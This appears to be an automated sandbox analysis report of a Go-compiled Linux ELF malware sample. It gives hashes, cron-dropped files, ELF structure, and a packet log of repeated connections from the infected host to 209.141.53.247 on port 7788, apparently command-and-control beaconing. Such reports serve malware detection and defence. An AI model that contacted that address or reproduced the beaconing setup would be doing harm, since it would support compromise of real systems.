                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                        Malicious:false
                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                        Process:/usr/sbin/cron
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:V:V
                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                        Malicious:false
                        Preview:0
                        Process:/usr/sbin/cron
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:V:V
                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                        Malicious:false
                        Preview:0
                        Process:/usr/sbin/cron
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):10
                        Entropy (8bit):2.321928094887362
                        Encrypted:false
                        SSDEEP:3:HVJHVJ:1JHVJ
                        MD5:A0C1AFEC9787E1805C73DCC391DB17CB
                        SHA1:E77C81DD5CF8A6F42BF051F455582F37E773316F
                        SHA-256:5B20174B6184CF3D08C780B3855515A81188DCE396033CA9ECBADA6D9656B1D5
                        SHA-512:80275742A78DD1B577EC4588800354A8D48C0DB52FA9CDF4D05D376980927AB0313E6620F6FC9263ACE409C1719075E6631468308BEB47312A0CDC7D03485BE3
                        Malicious:false
                        Preview:5704.5704.
                        File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, Go BuildID=_U9f3XZujO1ziaaA9kDm/BXkeuDQ1mdANV2QHaIjH/wE0wc7HzHXzDzEQ2tVw9/s7Z6tpCNX0WmjkLFO5QS, stripped
                        Entropy (8bit):6.253687938360149
                        TrID:
                        • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                        • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                        File name:ausNOyj9by.elf
                        File size:5'181'592 bytes
                        MD5:ac46e9818cd936fbfcba5effd7f4e850
                        SHA1:9a058ce2e1a413ae24b0c23e49b68d1b2f3f2777
                        SHA256:e23cd1ab03a3a03803e920efb2001fc6c4ae34c50ef647271898edc1c87ccde4
                        SHA512:38fe3086130ccf009bd44d0d2666f1d9a03d993c7fccfdaa1fb6b779b457cb0c76147f95363b73326dc5a18bd1ed89883ed0952836b1368b38f5bc3378f6a4dc
                        SSDEEP:49152:FPhq6f/l+XZKQn1VQPtHCVfsrAeg7UWsnc+m347J7Gr:+6f/lkBYCTo8r
                        TLSH:DD363B50FAC715F6E9031D3044ABA27F57315E09CB24DB87EA44BF2AF93B692193620D
                        File Content Preview:.ELF....................Po..4...........4. ...(.........4...4...4...................................d...d.............................'...'...............'..`,..`,..V"..V"..............@J...N...N.`...............Q.td.......................................

                        ELF header

                        Class:ELF32
                        Data:2's complement, little endian
                        Version:1 (current)
                        Machine:Intel 80386
                        Version Number:0x1
                        Type:EXEC (Executable file)
                        OS/ABI:UNIX - System V
                        ABI Version:0
                        Entry Point Address:0x80b6f50
                        Flags:0x0
                        ELF Header Size:52
                        Program Header Offset:52
                        Program Header Size:32
                        Number of Program Headers:6
                        Section Header Offset:244
                        Section Header Size:40
                        Number of Section Headers:14
                        Header String Table Index:13
                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                        NULL0x00x00x00x00x0000
                        .textPROGBITS0x80490000x10000x27c4ed0x00x6AX0016
                        .rodataPROGBITS0x82c60000x27e0000xcec590x00x2A0032
                        .typelinkPROGBITS0x8394c600x34cc600x17740x00x2A0032
                        .itablinkPROGBITS0x83963e00x34e3e00x4900x00x2A0032
                        .gosymtabPROGBITS0x83968700x34e8700x00x00x2A001
                        .gopclntabPROGBITS0x83968800x34e8800x154e600x00x2A0032
                        .go.buildinfoPROGBITS0x84ec0000x4a40000x1b00x00x3WA0016
                        .noptrdataPROGBITS0x84ec1c00x4a41c00x468e00x00x3WA0032
                        .dataPROGBITS0x8532aa00x4eaaa00x57a80x00x3WA0032
                        .bssNOBITS0x85382600x4f02600x2d8080x00x3WA0032
                        .noptrbssNOBITS0x8565a800x51da800x7f600x00x3WA0032
                        .note.go.buildidNOTE0x8048f9c0xf9c0x640x00x2A004
                        .shstrtabSTRTAB0x00x4f10000x980x00x0001
                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                        PHDR0x340x80480340x80480340xc00xc02.92370x4R 0x1000
                        NOTE0xf9c0x8048f9c0x8048f9c0x640x645.23330x4R 0x4.note.go.buildid
                        LOAD0x00x80480000x80480000x27d4ed0x27d4ed6.04770x5R E0x1000.text .note.go.buildid
                        LOAD0x27e0000x82c60000x82c60000x2256e00x2256e05.75720x4R 0x1000.rodata .typelink .itablink .gosymtab .gopclntab
                        LOAD0x4a40000x84ec0000x84ec0000x4c2600x819e06.46580x6RW 0x1000.go.buildinfo .noptrdata .data .bss .noptrbss
                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 2, 2024 18:13:13.978908062 CEST445347788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:13.983733892 CEST778844534209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:13.983838081 CEST445347788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:13.986397982 CEST445347788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:13.991256952 CEST778844534209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:15.594968081 CEST778844534209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:15.595479012 CEST445347788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:15.597827911 CEST445347788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:15.602547884 CEST778844534209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:15.611056089 CEST445367788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:15.615920067 CEST778844536209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:15.615982056 CEST445367788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:15.618510962 CEST445367788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:15.623333931 CEST778844536209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:17.230038881 CEST778844536209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:17.231394053 CEST445367788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:17.232498884 CEST445367788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:17.237293959 CEST778844536209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:17.246078968 CEST445387788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:17.250860929 CEST778844538209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:17.250948906 CEST445387788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:17.255422115 CEST445387788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:17.260215998 CEST778844538209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:18.833977938 CEST778844538209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:18.835345030 CEST445387788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:18.836185932 CEST445387788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:18.842900038 CEST778844538209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:18.849167109 CEST445407788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:18.853944063 CEST778844540209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:18.854007959 CEST445407788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:18.857336044 CEST445407788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:18.862132072 CEST778844540209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:20.557595015 CEST778844540209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:20.559259892 CEST445407788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:20.559361935 CEST445407788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:20.760271072 CEST778844540209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:20.760489941 CEST445407788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:20.763495922 CEST778844540209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:20.770406008 CEST445427788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:20.775448084 CEST778844542209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:20.775501966 CEST445427788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:20.780689955 CEST445427788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:20.785461903 CEST778844542209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:22.386065006 CEST778844542209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:22.387191057 CEST445427788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:22.388020039 CEST445427788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:22.393225908 CEST778844542209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:22.404088974 CEST445447788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:22.409037113 CEST778844544209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:22.409085035 CEST445447788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:22.411356926 CEST445447788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:22.416450024 CEST778844544209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:24.180080891 CEST778844544209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:24.181886911 CEST445447788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:24.189835072 CEST778844544209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:24.195370913 CEST445467788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:24.202636003 CEST778844546209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:24.202713966 CEST445467788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:24.205152988 CEST445467788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:24.211858988 CEST778844546209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:25.787130117 CEST778844546209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:25.788908958 CEST445467788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:25.793709040 CEST778844546209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:25.800872087 CEST445487788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:25.805736065 CEST778844548209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:25.805794001 CEST445487788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:25.808315039 CEST445487788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:25.813050032 CEST778844548209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:27.396617889 CEST778844548209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:27.398530006 CEST445487788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:27.403520107 CEST778844548209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:27.410536051 CEST445507788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:27.415379047 CEST778844550209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:27.415432930 CEST445507788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:27.417397022 CEST445507788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:27.422266960 CEST778844550209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:29.027040005 CEST778844550209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:29.029330969 CEST445507788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:29.034291029 CEST778844550209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:29.043451071 CEST445527788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:29.048276901 CEST778844552209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:29.048338890 CEST445527788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:29.056499958 CEST445527788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:29.061378956 CEST778844552209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:30.633251905 CEST778844552209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:30.634848118 CEST445527788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:30.634896040 CEST445527788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:30.640676022 CEST778844552209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:30.651601076 CEST445547788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:30.656718016 CEST778844554209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:30.656770945 CEST445547788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:30.658667088 CEST445547788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:30.666207075 CEST778844554209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:32.280204058 CEST778844554209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:32.282254934 CEST445547788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:32.287062883 CEST778844554209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:32.294147015 CEST445567788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:32.298882961 CEST778844556209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:32.298939943 CEST445567788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:32.300693989 CEST445567788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:32.305452108 CEST778844556209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:33.881673098 CEST778844556209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:33.882755995 CEST445567788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:33.884275913 CEST445567788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:33.889029980 CEST778844556209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:33.896918058 CEST445587788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:33.901649952 CEST778844558209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:33.901698112 CEST445587788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:33.903659105 CEST445587788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:33.909133911 CEST778844558209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:35.491439104 CEST778844558209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:35.494556904 CEST445587788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:35.500101089 CEST778844558209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:35.509556055 CEST445607788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:35.514419079 CEST778844560209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:35.514511108 CEST445607788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:35.517875910 CEST445607788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:35.523747921 CEST778844560209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:37.119867086 CEST778844560209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:37.122615099 CEST445607788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:37.122689009 CEST445607788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:37.127716064 CEST778844560209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:37.136730909 CEST445627788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:37.141622066 CEST778844562209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:37.141714096 CEST445627788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:37.144500971 CEST445627788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:37.149794102 CEST778844562209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:38.726708889 CEST778844562209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:38.728766918 CEST445627788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:38.733666897 CEST778844562209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:38.740493059 CEST445647788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:38.745615005 CEST778844564209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:38.745759964 CEST445647788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:38.747786045 CEST445647788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:38.752566099 CEST778844564209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:40.581878901 CEST778844564209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:40.582475901 CEST445647788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:40.584935904 CEST445647788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:40.612796068 CEST778844564209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:40.612837076 CEST778844564209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:40.612870932 CEST445647788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:40.616715908 CEST445667788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:40.621603966 CEST778844566209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:40.621658087 CEST445667788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:40.624125004 CEST445667788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:40.628988028 CEST778844566209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:42.209018946 CEST778844566209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:42.210403919 CEST445667788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:42.212349892 CEST445667788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:42.217189074 CEST778844566209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:42.224966049 CEST445687788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:42.229779005 CEST778844568209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:42.229847908 CEST445687788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:42.232851028 CEST445687788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:42.237703085 CEST778844568209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:43.820372105 CEST778844568209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:43.822432995 CEST445687788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:43.824500084 CEST445687788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:43.829293013 CEST778844568209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:43.841608047 CEST445707788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:43.847439051 CEST778844570209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:43.847513914 CEST445707788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:43.854423046 CEST445707788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:43.859405994 CEST778844570209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:45.465576887 CEST778844570209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:45.466267109 CEST445707788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:45.468724012 CEST445707788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:45.473653078 CEST778844570209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:45.482409954 CEST445727788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:45.487396002 CEST778844572209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:45.487493038 CEST445727788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:45.490643024 CEST445727788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:45.495575905 CEST778844572209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:47.247170925 CEST778844572209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:47.249806881 CEST445727788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:47.256038904 CEST778844572209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:47.264278889 CEST445747788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:47.269103050 CEST778844574209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:47.269166946 CEST445747788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:47.273125887 CEST445747788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:47.281322956 CEST778844574209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:48.869649887 CEST778844574209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:48.870177031 CEST445747788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:48.872292995 CEST445747788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:48.877142906 CEST778844574209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:48.884917021 CEST445767788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:48.890006065 CEST778844576209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:48.890083075 CEST445767788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:48.896682978 CEST445767788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:48.901545048 CEST778844576209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:50.492943048 CEST778844576209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:50.494066954 CEST445767788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:50.495898962 CEST445767788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:50.500673056 CEST778844576209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:50.511117935 CEST445787788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:50.516057968 CEST778844578209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:50.516134977 CEST445787788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:50.521778107 CEST445787788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:50.526709080 CEST778844578209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:52.116014004 CEST778844578209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:52.117805958 CEST445787788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:52.122672081 CEST778844578209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:52.131154060 CEST445807788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:52.136190891 CEST778844580209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:52.136245966 CEST445807788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:52.138036966 CEST445807788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:52.142853975 CEST778844580209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:53.725862980 CEST778844580209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:53.728055954 CEST445807788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:53.732950926 CEST778844580209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:53.739171982 CEST445827788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:53.744854927 CEST778844582209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:53.744923115 CEST445827788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:53.748522997 CEST445827788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:53.753571033 CEST778844582209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:55.474291086 CEST778844582209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:55.476049900 CEST445827788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:55.480876923 CEST778844582209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:55.487606049 CEST445847788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:55.492422104 CEST778844584209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:55.492507935 CEST445847788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:55.494812012 CEST445847788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:55.499739885 CEST778844584209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:57.107391119 CEST778844584209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:57.109198093 CEST445847788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:57.114064932 CEST778844584209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:57.121283054 CEST445867788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:57.126133919 CEST778844586209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:57.126204014 CEST445867788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:57.129148006 CEST445867788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:57.133929014 CEST778844586209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:58.729006052 CEST778844586209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:58.729721069 CEST445867788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:58.731642008 CEST445867788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:58.736776114 CEST778844586209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:58.742845058 CEST445887788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:58.747694016 CEST778844588209.141.53.247192.168.2.14
                        Jul 2, 2024 18:13:58.747749090 CEST445887788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:58.750113964 CEST445887788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:13:58.754956961 CEST778844588209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:00.354080915 CEST778844588209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:00.356043100 CEST445887788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:00.360800982 CEST778844588209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:00.368726015 CEST445907788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:00.373614073 CEST778844590209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:00.373667955 CEST445907788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:00.375663996 CEST445907788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:00.381382942 CEST778844590209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:01.970207930 CEST778844590209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:01.971995115 CEST445907788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:01.976798058 CEST778844590209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:01.984332085 CEST445927788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:01.989208937 CEST778844592209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:01.989254951 CEST445927788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:01.992224932 CEST445927788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:01.997330904 CEST778844592209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:03.605109930 CEST778844592209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:03.605549097 CEST445927788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:03.607228041 CEST445927788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:03.612313032 CEST778844592209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:03.618751049 CEST445947788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:03.624008894 CEST778844594209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:03.624073029 CEST445947788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:03.626909018 CEST445947788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:03.631767988 CEST778844594209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:05.227231979 CEST778844594209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:05.229065895 CEST445947788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:05.236022949 CEST778844594209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:05.244391918 CEST445967788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:05.249136925 CEST778844596209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:05.249221087 CEST445967788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:05.251703978 CEST445967788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:05.256501913 CEST778844596209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:06.854420900 CEST778844596209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:06.856543064 CEST445967788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:06.861387968 CEST778844596209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:06.869036913 CEST445987788192.168.2.14209.141.53.247
                        Jul 2, 2024 18:14:06.873999119 CEST778844598209.141.53.247192.168.2.14
                        Jul 2, 2024 18:14:06.874094963 CEST445987788192.168.2.14209.141.53.247
